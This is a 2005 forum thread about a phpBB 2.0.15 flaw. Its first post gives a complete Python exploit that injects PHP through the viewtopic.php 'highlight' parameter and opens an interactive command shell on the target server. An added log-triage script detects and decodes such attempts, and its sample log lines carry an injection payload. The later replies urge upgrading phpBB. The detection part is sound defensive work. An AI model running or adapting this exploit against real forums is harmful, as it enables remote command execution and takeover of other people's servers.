Post #1, Sep 1 2005, 10:50 AM
Advanced Member (Group: Members, Posts: 119, Joined: 3-August 05, Member No.: 10,207)
phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit
CODE
#!/usr/bin/pyth0n
# Python 2 script (urllib2, raw_input, print statement): python2 exploit.py <forum> <topic>
print "\nphpBB 2.0.15 arbitrary command execution eXploit"
print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none."

import sys
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

# Markers printed around the command output so it can be cut out of the returned HTML page.
INITTAG = '<g0>'
ENDTAG = '</g0>'

def makecmd(cmd):
    # Encode a string as chr(n).chr(n)... so the injected PHP contains no quote characters.
    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))

# Injected highlight value: close the PHP string literal with ', concatenate
# printf(INITTAG).system(cmd).printf(ENDTAG) onto it, then reopen the literal with '.
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"

def usage():
    print """Usage: %s <forum> <topic>

  forum - fully qualified url to the forum
          example: http://www.host.com/phpBB/
  topic - ID of an existing topic.
          Well you will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) < 3 or not sys.argv[2].isdigit():
        usage()
    else:
        # Normalise the forum URL to scheme://host/path/ with no query string or fragment.
        url = sys.argv[1]
        if url.count("://") == 0:
            url = "http://" + url
        url = list(urlparse(url))
        host = url[1]
        if not host: usage()
        if not url[0]: url[0] = 'http'
        if not url[2]: url[2] = '/'
        url[3] = url[4] = url[5] = ''
        url = urlunparse(url)
        if url[-1] != '/': url += '/'
        topic = quote_plus((sys.argv[2]))
        # Interactive pseudo-shell: every command typed becomes one GET request.
        while 1:
            try:
                cmd = raw_input("[%s]$ " % host).strip()
                if cmd[-1]==';': cmd=cmd[:-1]
                if (cmd == "exit"):
                    break
                else:
                    cmd = makecmd(cmd)
                    out = _ex % (url,topic,cmd)
                    try:
                        ret = urlopen(Request(out)).read()
                    except KeyboardInterrupt:
                        continue
                    except:
                        pass
                    else:
                        # Print whatever the page returned between the two markers.
                        ret = ret.split(INITTAG,1)
                        if len(ret)>1:
                            ret = ret[1].split(ENDTAG,1)
                            if len(ret)>1:
                                ret = ret[0].strip();
                                if ret: print ret
                                continue;
                    print "EXPLOIT FAILED"
            except:
                continue

This post has been edited by cmatcmextra: Sep 1 2005, 10:52 AM
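The exploit above builds its request as viewtopic.php?t=<topic>&highlight=%27.printf(...).system(...).printf(...).%27: the ' closes the PHP string literal the highlight words end up in, each . concatenates another call onto it, and every string the attacker needs is spelled as a chr() chain (see makecmd) so the payload itself contains no quotes; the <g0> and </g0> markers let the script cut the command output out of the returned page. Knowing that shape, a board admin or responder can spot attempts in the web server access log and recover the command that was run. The following is an added example (Python 3), not part of the original post and not phpBB code; the log lines, IP addresses, timestamps and user agents in it are constructed for illustration, and the second unquote() only normalises a double-encoded quote (%2527) the same way as a single one.

```python
"""Log triage for the viewtopic.php "highlight" injection used by the exploit above.

Added example (not part of the original post, and not phpBB code). It scans
Apache combined-format access-log lines, flags requests whose `highlight`
parameter breaks out of a PHP string literal, and rebuilds the shell command
hidden in the exploit's chr() chain so a responder can see what was executed.
The log lines below are constructed for the example, not real traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines: one exploit attempt (topic 12, command "id"),
# one legitimate search highlight, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Sep/2005:10:50:01 +0000] "GET /phpBB/viewtopic.php'
    '?t=12&highlight=%27.printf(chr(60).chr(103).chr(48).chr(62)).system(chr(105)'
    '.chr(100)).printf(chr(60).chr(47).chr(103).chr(48).chr(62)).%27 HTTP/1.0" '
    '200 5130 "-" "Python-urllib/2.4"',
    '198.51.100.7 - - [01/Sep/2005:10:51:14 +0000] "GET /phpBB/viewtopic.php'
    '?t=12&highlight=phpbb+upgrade HTTP/1.1" 200 4871 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Sep/2005:10:52:30 +0000] "GET /phpBB/index.php '
    'HTTP/1.1" 200 8012 "-" "Mozilla/5.0"',
]

# Apache combined format: client, ident, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A quote closing the PHP string literal, then the concatenation operator and a call.
PHP_BREAKOUT_RE = re.compile(r"'\s*\.\s*[A-Za-z_]\w*\s*\(")
# The exploit spells every string as chr(n).chr(n)... so the payload needs no quotes.
CHR_CHAIN_RE = re.compile(r'chr\((\d+)\)')
SYSTEM_CALL_RE = re.compile(r'system\(((?:chr\(\d+\)\.?)+)\)')


def decode_chr_chain(expr):
    """Reverse the exploit's makecmd(): 'chr(105).chr(100)' -> 'id'."""
    return ''.join(chr(int(n)) for n in CHR_CHAIN_RE.findall(expr))


def highlight_values(request_path):
    """Return the decoded `highlight` values of a viewtopic.php request, else []."""
    parts = urlsplit(request_path)
    if not parts.path.endswith('/viewtopic.php'):
        return []
    # parse_qs removes one layer of percent-encoding; unquote() removes a second
    # so a double-encoded quote (%2527) is normalised the same way as %27.
    return [unquote(v) for v in parse_qs(parts.query).get('highlight', [])]


def is_highlight_injection(request_path):
    """True when a highlight value closes the string literal and calls a function."""
    return any(PHP_BREAKOUT_RE.search(v) for v in highlight_values(request_path))


def extract_system_commands(payload):
    """Decoded argument of every system(chr(..)...) call in an injected payload."""
    return [decode_chr_chain(arg) for arg in SYSTEM_CALL_RE.findall(payload)]


def triage(log_lines):
    """One finding per exploit attempt: who, when, which topic, which commands."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not is_highlight_injection(m.group('path')):
            continue
        path = m.group('path')
        query = parse_qs(urlsplit(path).query)
        commands = []
        for payload in highlight_values(path):
            commands.extend(extract_system_commands(payload))
        findings.append({
            'ip': m.group('ip'),
            'time': m.group('ts'),
            'topic': query.get('t', [''])[0],
            'commands': commands,
        })
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print('%(time)s %(ip)s topic=%(topic)s ran %(commands)r' % f)
```

Running the script prints one line per attempt found in SAMPLE_LOG. Against a real board, feed it the access log instead, and extend SYSTEM_CALL_RE if a variant of the exploit calls something other than system(); the breakout check itself does not depend on which function follows the quote.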
Post #2, Sep 1 2005, 05:00 PM
Privileged Member (Group: Members, Posts: 702, Joined: 17-February 05, Member No.: 3,817)
You could give the security updates link of the phpbb dot com homepage. Not only phpBB 2.0.15 has security exploits; 2.0.16 also has one or more problems, and phpBB already released 2.0.17 some time ago, fixing all the exploits found so far, and has advised all users of the software to upgrade their forums/boards as soon as possible.
I was updating one of the boards from 2.0.10 to 2.0.17; it took more than 2 hours to finish all the updates, and now I can sleep peacefully. Those who haven't updated their boards can look for upgrade mods, which is good for those who installed many mods in their boards. Look out for those mods on the phpbb dot com homepage.
Post #3, Sep 2 2005, 09:55 AM
$p4m 0n j00 $h4m3 m3 0nc3 $p4m 0n m3 $h4m3 m3 7\/\/1c3 (Group: [HOSTED], Posts: 6,308, Joined: 21-September 04, From: 9r33|\| 399$ 4|\|D 5P4/\/\, Member No.: 1,218)
It's amazing, I don't know who's coming out with more bugs, IPB or phpBB, but yeah, you let those at phpBB know about this as well.
Post #4, Sep 2 2005, 01:16 PM
Member [Level 3] (Group: Members, Posts: 94, Joined: 2-January 05, From: Dotian.com, Member No.: 3,085)
As with all other software and scripts, phpBB also has a long history of vulnerabilities. But it is better than others because of the quick developer community response to newly found security loopholes.
phpBB issues are generally fixed in much less time than in other systems, and that is why I like phpBB. For the user, it is always good practice to bookmark the phpBB homepage to get the update news in time.